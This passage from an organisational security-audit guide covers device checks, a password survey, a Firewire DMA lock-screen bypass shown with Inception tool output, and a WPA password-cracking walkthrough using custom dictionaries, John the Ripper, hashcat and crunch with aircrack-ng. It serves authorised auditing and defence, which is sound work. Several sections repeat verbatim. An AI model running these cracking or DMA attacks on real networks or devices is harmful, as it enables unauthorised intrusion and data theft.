When possible, build-in drive encryption (Filevault on OSX, BitLockeron Windows, and LUKS on Linux) tend to offer the most seamless, user-friendly experiences. VeraCrypt offers free cross-platform drive encryption and cna also create encrypted drives which can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network options. Testing to ensure systems can still perform expected office natworking (file sharing, printing, etc.) is essential unless alternatives are created.

Password Security Survey

Summary

Weak and "shared" passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords, and password re-use is common. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.

Overview
Materials Needed
Considerations
Walkthrough

Adapt this survey to get a sense of how passwords are used in the organization. Anonymous paper surveys, later destroyed, are a good way to gather this information. The earlier questions are more important in terms of getting a sense of password practices, so consider adapting or shortening the survey based on staff/leadership buy-in and risk considerations.

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

Have you written down your current password?

If you wrote down your current password, how is it protected (choose all that apply) ?

Have you ever forgotten your current password?

If yes, how did you recover it?

Have you ever forgotten old work passwords?

If yes, how did you recover it?

When you created your current password, which of the following did you do?

Do you have a set of passwords you reuse in different places?

Do you have a password that you use for different accounts with a slight modification for each account?

Did you use any of the following strategies to create your current password (choose all that apply) ?

How long is your current password (total number of characters)?

What symbols (characters other than letters and numbers) are in your password?

How many lower-case letters are in your current password?

How many upper-case letters are in your current password?

In which positions in your password are the numbers?

How many symbols are in your current password?

In which positions in your password are the symbols?

Recommendation
Recommendation: Adopt Stronger Passwords

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” expecially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work, and to use unique passwords for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

A Day in the Life

Covered in full in User Device Assessment:

A Night in the Life

Covered in full in User Device Assessment:

Assessing Usage of Cloud Services

Covered in full in Data Assessment:

Network Mapping

Covered in full in Network Mapping

Physical Security Guided Tour

Covered in full in Physical Assessment:

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

User Device Assessment

Summary

This component allows the auditor to assess the security of the individual devices on the network. This component consists of interviews, surveys, and inspection of devices.

Purpose

Compromised devices have the ability to undermine nearly any other organizational attempt at securing information. Knowing if devices receive basic software and security upgrades and what core protections against unauthorized access exist is vital to designing a strategy to make the host more secure.

The Flow Of Information

User Device Assessment Information Flow
User Device Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Password Security

Privilege Separation Across OS

Examining Firewalls Across OS

Identifying Software Versions

Device Encryption By OS

Anti-Virus Updates

Identifying Odd/One-Off Services

Activities

Device and Behaviour Assessment

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software running on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

The auditor inspects a subset of key and/or representative user devices (work & personal). The auditor should focus on the work devices to limit scope creep, but if the office has many personal devices accessing organizational accounts/data, the auditor should share what "red flags" they are looking for and work in tandem with device owners and/or IT staff. For a small office, it may be possible to check every machine. For larger offices, the auditor should use a subset to get a feel for the overall security stance of user devices.

As you work with staff members, also interview them about the other devices they use such as phones and tablets, and how they connect to work services - email/webmail, chat Apps, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

Below is a checklist to assist in checking across different platforms/versions for common security needs.

OSX
Windows

If Windows is not your primary OS, you can download sample Virtual Machines (with time limitations) from Microsoft through their project to improve IE support via https://www.modern.ie/en-us/virtualization-tools#downloads (see also http://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/ and https://modernievirt.blob.core.windows.net/vhd/virtualmachine_instructions_2014-01-21.pdf)

Windows 10

Windows 8

Installed updates

Control Panel Programs and features installed updates CLI: http://www.techsupportalert.com/en/quick-and-easy-way-list-all-windows-updates-installed-your-system.htm

Windows 7

In Windows 7, (GUI) Control Panel -- All Control Panel Items -- Action Center (Security tab) provides a quick run-down of most security features installed and their update status. It does not show drive encryption or specific versions.

Windows XP

If user is still operating on windows XP, recommendation is to upgrade to later windows. Windows XP is no longer supported and is not receiving security updates: https://www.microsoft.com/windows/en-us/xp/end-of-xp-support.aspx

If there is an organizationally critical system relying on Windows XP, removing it from the network and carefully managing data exchange with it may provide a bridge solution until a replacement process can be funded and rolled out.

Linux
Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Outdated - Update Operating Systems and Other Software

Operating Systems and Softwares of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If there are not needed for work by the users, uninstall them

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Maware Scanner

An Anti-virus and Anti-malware offer some minimal protection to the system and therefore is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless. Therefore ensure that continuous udpdating of AV is done.

If Unencrypted Drive - Encrypt Hard Drives

When possible, build-in drive encryption (Filevault on OSX, BitLockeron Windows, and LUKS on Linux) tend to offer the most seamless, user-friendly experiences. VeraCrypt offers free cross-platform drive encryption and cna also create encrypted drives which can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network options. Testing to ensure systems can still perform expected office natworking (file sharing, printing, etc.) is essential unless alternatives are created.

Mobile Device Assessment

Summary

The auditor checks for the type of mobile devices in the organizations Follows a series of steps depending on the different mobile devices.

The key considerations with regards to mobile devices are the user, the type of device, and the data it manages. - the data is kept secure; - device is configured with the recommended security settings; - the organizational policies and procedures with regards to mobile devices; - In case of organization owned devices, that management has control over its facilitates.

These considerations contribute to the development of the report component.

Overview
Materials Needed
Considerations

NB: The auditor should not access any personal mobile device absence of the owner of the device and any step taken should be explained before being implemented.

Walkthrough

The auditor confirms the number and nature of mobile devices that the organization owns. The auditor should keep within the agreed scope. But in the case where multiple mobile devices outside the agreed scope access the organizations' resources, then redefining of the scope may be necessary. Auditor should also consider the instructions under the device checklist.

As you work with staff members, also remember to interview them about the devices they use. This can alternate between mobile devices and non-mobile devices.

Below are some guiding questions to use. And this is an opportunity for the auditor to go deeper into any area concerning devices.

Guiding questions:

Recommendation

A Day in the Life

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software runing on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

As you work with staff members (this pairs well with the device checklist activity), also interview them about the other devices they use, and how they connect to work services - email/webmail, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

This can also be done remotely. Ask to have the staff member use a screensharing tool (meet.jit.si or appear.in offer easy-to-use, browser based options) so that you can watch how they interact with their computer and what applications are active in the background.

Phone Usage

User Software and Tools

Remote Services

Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Outdated - Update Operating Systems and Other Software

Operating Systems and Softwares of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If there are not needed for work by the users, uninstall them

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Maware Scanner

An Anti-virus and Anti-malware offer some minimal protection to the system and therefore is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless. Therefore ensure that continuous udpdating of AV is done.

If Unencrypted Drive - Encrypt Hard Drives

When possible, build-in drive encryption (Filevault on OSX, BitLockeron Windows, and LUKS on Linux) tend to offer the most seamless, user-friendly experiences. VeraCrypt offers free cross-platform drive encryption and cna also create encrypted drives which can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network options. Testing to ensure systems can still perform expected office natworking (file sharing, printing, etc.) is essential unless alternatives are created.

A Night in the Life

Summary

The auditor interviews the staff about their practices, personal devices, software and other security capabilities that they use outside of work. The auditor checks for known vulnerabilities to any out of date software and identifies risks in the practices and behaviors.

This is used to develop a report component exposing how practices outside of their work can affect their personal security and that of the organization.

Overview
Considerations
Walkthrough

As you work with staff members (this pairs well with the device checklist activity and a day in the life), also interview them about the other devices they use, and how they connect to work or personal services - email/webmail, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, social media, and website management tools.

This can also be done remotely. Ask to have the staff member use a screensharing tool (meet.jit.si or appear.in offer easy-to-use, browser based options) so that you can watch how they interact with their computer and what applications are active in the background.

Phone Usage

User Software and Tools

Remote Services

Personal Practices

Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Outdated - Update Operating Systems and Other Software

Operating Systems and Softwares of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If there are not needed for work by the users, uninstall them

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Maware Scanner

An Anti-virus and Anti-malware offer some minimal protection to the system and therefore is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless. Therefore ensure that continuous udpdating of AV is done.

If Unencrypted Drive - Encrypt Hard Drives

When possible, build-in drive encryption (Filevault on OSX, BitLockeron Windows, and LUKS on Linux) tend to offer the most seamless, user-friendly experiences. VeraCrypt offers free cross-platform drive encryption and cna also create encrypted drives which can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network options. Testing to ensure systems can still perform expected office natworking (file sharing, printing, etc.) is essential unless alternatives are created.

Multi Factor Authentication

When possible, enable multi factor authentication on work accounts (email, social media, website administration, etc). Specially if the accounts are being accessed with personal devices.

Firewire Access to Encrypted/Locked computers

Summary

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

Any attacker who obtains a running (including sleeping and hibernating!) Windows, Mac, or even Linux laptop with a Firewire port, an ExpressCard expansion slot, or a Thunderbolt port will be able to read, record or modify any sensitive information on the device, even if the screen is “locked” and the information is stored on an encrypted volume or in an encrypted folder. This applies to threats involving loss, theft and confiscation, but also to “checkpoint” scenarios in which the attacker may only have access for a few minutes.

This attack requires physical control of a machine that is not powered off. Full details of the scope of the attack are available at http://www.breaknenter.org/projects/inception/ .

Overview
Materials Needed
Considerations
Walkthrough

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

The threat describe in this section is more complex than it needs to be. In fact, unencrypted data are vulnerable to any number of simple attacks, the two most straightforward being: 1) rebooting the computer from a USB stick CD-ROM or DVD containing an alternate operating system, then copying all of the data; or 2) removing the hard drive, inserting it into a different machine, then copying all of the data. These techniques, which work on nearly any computer, even if a strong login password has been set, are effective and widely used, but they require extended physical access to the device. A slightly different attack is described below, one that only requires physical access for a few minutes. It, too, works regardless of login/screen-lock passwords, though only devices with Firewire ports or expansion slots (ExpressCard, CardBus, PCMCIA, etc.) are vulnerable.

The steps required to defend against all of these threats is the same: encrypt your data using a tool like Microsoft’s BitLocker, Apple’s FileVaule or the open-source Truecrypt application. The Firewire attack highlighted here is particularly illustrative, however, because it serves as a reminder that merely setting up an encrypted volume is not enough. In much the same way that a lock does little to protect your home if the door to which it is attached remains open, data encryption is rarely effective while you are logged into your computer. Even if the screen is locked (which would foil the “reboot” and “hard drive removal” attacks described briefly above), an attacker may still find a way to access your sensitive data, while the computer is up and running, because the decryption key is present in the computer’s memory. (This is how large-scale encryption actually works. Information remains encrypted at all times, on the storage device where it lives, but you are able to access it while you are logged in, or while your encrypted volume is “open,” because your computer decrypts and encrypts it on the fly.) Walkthrough

Step 1: First, the attacker would connect her computer to the victim’s using a Firewire cable. Either or both machines could be using a true Firewire port or a Firewire expansion card. When a Firewire ExpressCard expansion card is inserted, Windows automatically installs and configures the necessary drivers, even if nobody is logged into the laptop.

Step 2: Once connected, the attacker simply runs the Inception tool, selects the operating system of the target machine and waits a minute or two for the attack to complete (depending on the amount of RAM present):

$ incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.0 (C) Carsten Maartmann-Moe 2012
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] Initializing bus and enabling SBP-2, please wait  1 seconds or press Ctrl+C
[*] DMA shields should be down by now. Attacking...
[*] Searching, 1328 MiB so far
[*] Signature found at 0x8b50c321 (in page # 570636)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In the case of the laptops tested, Inception took approximately two minutes to reach the final, somewhat self-congratulatory line shown above. At that point, we were able to login using any password. (Entering “asdf” worked just fine, and gave us full access to all data on the computer.) Inception works by temporarily replacing authentication code using the Firewire’s protocol’s direct memory access (DMA). After a reboot, everything is restored to its original state.

Once again, it is worth noting that successful mitigation of this issue requires a combination of technology (data encryption) and some level of behavior change (shutting down laptops at the end of the day, when traveling and at any time when confiscation, theft, loss or tampering are particularly likely.)

Material that may be Useful:
Recommendation

Password Security Survey

Summary

Weak and "shared" passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords, and password re-use is common. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.

Overview
Materials Needed
Considerations
Walkthrough

Adapt this survey to get a sense of how passwords are used in the organization. Anonymous paper surveys, later destroyed, are a good way to gather this information. The earlier questions are more important in terms of getting a sense of password practices, so consider adapting or shortening the survey based on staff/leadership buy-in and risk considerations.

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

Have you written down your current password?

If you wrote down your current password, how is it protected (choose all that apply) ?

Have you ever forgotten your current password?

If yes, how did you recover it?

Have you ever forgotten old work passwords?

If yes, how did you recover it?

When you created your current password, which of the following did you do?

Do you have a set of passwords you reuse in different places?

Do you have a password that you use for different accounts with a slight modification for each account?

Did you use any of the following strategies to create your current password (choose all that apply) ?

How long is your current password (total number of characters)?

What symbols (characters other than letters and numbers) are in your password?

How many lower-case letters are in your current password?

How many upper-case letters are in your current password?

In which positions in your password are the numbers?

How many symbols are in your current password?

In which positions in your password are the symbols?

Recommendation
Recommendation: Adopt Stronger Passwords

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” expecially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work, and to use unique passwords for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

Password Strength

Summary

This exercise supports the auditor in building an effective dictionary that is customized to an organization.

This dictionary can then be used in a variety of ways:

Overview
Materials Needed
Considerations
Walkthrough

This component provides resources and recommendations on cracking passwords - both the creation of dictionaries and rules to modify those dictionaries, as well as some basic implementation as well. This is a dangerous (and in many cases, illegal) skill to use, and should be more of a guide to auditors on what password security myths do not work against modern password cracking software, and to use only with permission and only in very specific situations as a demonstration of the power of even a common laptop against weak passwords.

This skillset, plus demonstration against non-invasive accounts, provides an opening for a discussion with staff on password security. See Level Up for further activities and exercises around passwords.

Primarily for use in the Network Access component, building a password dictionary, understanding the ways to automatically mutate it, and running it against passwords is a useful skill to have, and to use to explain why simple passwords are insecure. This Ars Technica article provides a good insight into the path to tackle iterative password cracking using a variety of tools to meet different goals.

These instructions use a small set of password cracking tools, but many are possible. If there are tools you are more familiar or comfortable with using, these by no means are required. The only constraints are to be respectful and responsible, as well as keeping focused on the overall goals and not getting bogged down.

A good wordlist with a few tweaks tends to break most passwords. Using a collection of all English words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords in a reasonable timeframe.

An approach which begins with quick, but often fruitful, attacks to more and more complex (and time consuming) attacks is the most rewarding. However, after an hour or two of password hacking, the in-office time on other activities is more valuable, so admit defeat and move on. See the Recommendations section for talking points around the levels of password cracking that exist in the world. You can work on passwords offline/overnight/post-audit for report completeness.

Here is a suggested path to take with suggested tools to help. You might try the first few steps in both the targeted keyword approach and the dictionary approach before moving on to the more complex mutations towards the end of each path.

Dictionary Research and Creation

Before you arrive on-site it is important to have your password cracking tools downloaded and relevant dictionaries ready to go, as your main demonstration and use of these tools is to gain access to the organization's network. The effectiveness of this demonstration is drastically reduced if you already have had to ask for the password to connect to the Internet and update your dictionaries, tools, or so on. Some of these files (especially larger password dictionaries) can be quite large, so downloading them in-country is not recommended.

Many password dictionary sites, such as SkullSecurity , maintain core dictionaries in multiple languages. If your target language is not available, some quick regular expression work can turn spell-check dictionaries (such as those used by LibreOffice into useful word lists. It is generally useful to always test with English in addition to the target language.

CloudCracker and OpenWall have, for a fee, well-tested password dictionaries.

Keyword generation In addition, create a customized dictionary with words related to the subject as revealed in the Remote Assessment research: organization name, street address, phone number, email domain, wireless network name, etc. For the organization "ExampleOrg , which has its offices at 123 Central St., Federal District, Countryzstan , which does human rights and journalism work and was founded in 1992, some context-based dictionary additions would be:

exampleorg
example
exa
mple
org
123
central
federal
district
countryzstan
human
rights
journo
journalism
1992
92

Also add common password fragments: qwerty, 1234/5/6/7/8, and, based on field experience, four-digit dates back to the year 2001 (plus adding in the founding year of the organization). It's also useful to see what calendar system is in use at your organization's location as some cultures don't use Gregorian years. It's quite amazing how often a recent year will be part of a wifi password -- this presentation discusses many common patterns in passwords: https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

Optional Further steps

Use CeWL to spider the organization's web properties to generate additional phrases. This list will need review, as some of the generated content is not very useful, but may be useful if the site is not in a language the auditor reads fluently.

For passwords other than WPA, specific policies or patterns may help to focus your password dictionary further. PACK, or Password Analysis and Cracking Toolkit is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers." PACK is most useful for large sets of passwords, where it can detect patterns in already-broken passwords to help build new rules. Both password cracking tools listed here are powerful, and have slightly different abilities. The auditor should choose the one they prefer and/or the one which has the features they desire for this job.

Build more complex password lists with scripting and Hashcat One quick way to build a more complex password list is to simply double the list up (a "combinator" attack), so that it includes an entry for each pair of these strings:

You can do a 1-way version of this list simply, such as:

 $ for foo in `cat pwdlist.txt`; do for bar in `cat pwdlist.txt`; do printf $foo$bar'\n'; done; done > pwdpairs.txt
 $ cat pwdlist.txt >> pwdpairs.txt

Hashcat can do this in a live attack under its "combinator" mode, and hashcat-utils (hiding in /usr/share/hashcat-utils/combinator.bin) provides this as a standalone tool. This provides a true combination of the list, so it exponentially increases the list size - use with caution, or use with one larger dictionary and one smaller dictionary.

For example, use these combination approach on your custom dictionary (combining it with itself, creating combinations from the above list such as example92, journorights, exampleorgrights).

$  /usr/share/hashcat-utils/combinator.bin dict.txt dict.txt

Hashcat is extremely powerful when you have desktop computer systems to use, but has a few wordlist manipulation tools that are useful regardless.

More References: (http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 , http://www.darkmoreops.com/2014/08/18/cracking-wpa2-wpa-with-hashcat-kali-linux/ )

Use word mutation with John the Ripper (JtR) JtR is a powerful tool you can use in combination of existing wordlists, but it also can add in common substitutions (people using zero for the letter "o"). JtR can be used to generate a static list of passwords for other programs, or it can be used directly against a password database. JtR is a bit weak combining words within a wordlist, so you should apply your customizations and any folding before moving on to JtR.

You can add custom "rules" to aid in these substitutions - a base set is included with JtR, but a much more powerful set is added by [KoreLogic] (http://contest-2010.korelogic.com/rules.html). KoreLogic also provides a custom character set "chr file" that takes password frequency data from large collections of real-world passwords to speed up JtR's brute force mode. This PDF presentation has a good walkthrough of how John and Kore's rules work. LinuxConfig Offers another good walkthrough.

The bleeding-edge jumbo version combines both the built-in rules and an optimized version of the KoreLogic rules. This list of KoreLogic Rules provides nice descriptions of what the KoreLogic rules do. In bleeding-jumbo, you can remove "KoreLogicRules". BackReference provides a great example of rules usage.

Some particularly useful ones individual rulesets are: * AppendYears (appends years, from 1900 to 2019) and AppendCurrentYearSpecial (appends 2000-2019 with punctuation) * AddJustNumbers (adds 1-4 digits to the end of everything) * l33t (leet-speek combinations)

There are some build-in combinations of rulesets - for example, just --rules runs john's internal collection of default rules, and --rules:KoreLogic runs a collection of the KoreLogic rules in a thoughtful order, and --rules:all is useful if you hate life.

e.g. :

  $ john -w:dictionary.txt --rules:AppendYears --stdout

Building custom rules

PROTIP Create a dictionary with just "blah" and run various rules against it to understand how each ruleset or combination works. Note specifically that each rule multiplies the size of the dictionary by the number of permutations it introduces. Running the KoreLogic ruleset combination against a one word dictionary creates a list of 6,327,540 permutations on just that word, adding a column output is handy for additional visual impact.

JohnTheRipper/run/john -w=blah.txt --rules:all --stdout |column

Brute force, using John and crunch JtR's "incremental" mode is essentially an optimized brute force attack, so will take a very long time for anything but the shortest passwords, or passwords where you can limit the search space to a character set: "As of version 1.8.0, pre-defined incremental modes are "ASCII" (all 95 printable ASCII characters), "LM_ASCII" (for use on LM hashes), "Alnum" (all 62 alphanumeric characters), "Alpha" (all 52 letters), "LowerNum" (lowercase letters plus digits, for 36 total), "UpperNum" (uppercase letters plus digits, for 36 total), "LowerSpace" (lowercase letters plus space, for 27 total), "Lower" (lowercase letters), "Upper" (uppercase letters), and "Digits" (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for "LM_ASCII" (where password portions input to the LM hash halves are assumed to be truncated at length 7) and "Digits" (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download." (http://www.openwall.com/john/doc/MODES.shtml)

As a last resort, you can try a direct brute force attack overnight or post-audit to fill in details on key strength. Crunch is a very simple but thorough approach. Given enough time it will break a password, but it's not particularly fast, even at simple passwords. You can reduce the scope of this attack (and speed it up) if you have a reason to believe the password is all lower-case, all-numeric, or so on. WPA passwords are a minimum of 8 characters, a maximum of 16, and some wifi routers will accept punctuation, but in practice these are usually just [email protected]#$. — so:

$ /path/to/crunch 8 16 a[email protected]#$. | aircrack-ng -a 2 path/to/capture.pcap -b 00:11:22:33:44:55 -w -

This says to try every possible alpha-numeric combination from 8 to 16 characters. This will take a very, very, very long time.

Further Resources

Sample Practice For practice on any of these methods, you can use the wpa-Induction.pcap file from Wireshark.

https://www.schneier.com/blog/archives/2014/03/choosing_secure_1.html

http://zed0.co.uk/crossword/

http://www.instantcheckmate.com/crimewire/is-your-password-really-protecting-you/#lightbox/0/

Note that password cracking systems are rated on the number of password guesses they make per second. Stock laptop computers without high-end graphics cards or any other optimizations can guess 2500 passwords/second. More powerful desktop computers can test over a hundred million each second, and with graphics cards (GPUs) that rises to billions of passwords per second. (https://en.wikipedia.org/wiki/Password_cracking).

This website has a good explanation about how improving the complexity of a password affects how easy it is to break: http://www.lockdown.co.uk/?pg=combi, but is using very out of date numbers - consider a basic laptop able to produce "Class E" attacks, and a desktop, "Class F"

http://rumkin.com/tools/password/passchk.php

http://cyber-defense.sans.org/blog/downloads/ has a calculator buried in the zip file "scripts.zip"

http://www.dailymail.co.uk/sciencetech/article-2331984/Think-strong-password-Hackers-crack-16-character-passwords-hour.html

https://www.grc.com/haystack.htm

https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

http://www.nytimes.com/2014/11/19/magazine/the-secret-life-of-passwords.html?_r=1

Recommendation
Recommendation: Adopt Stronger Passwords

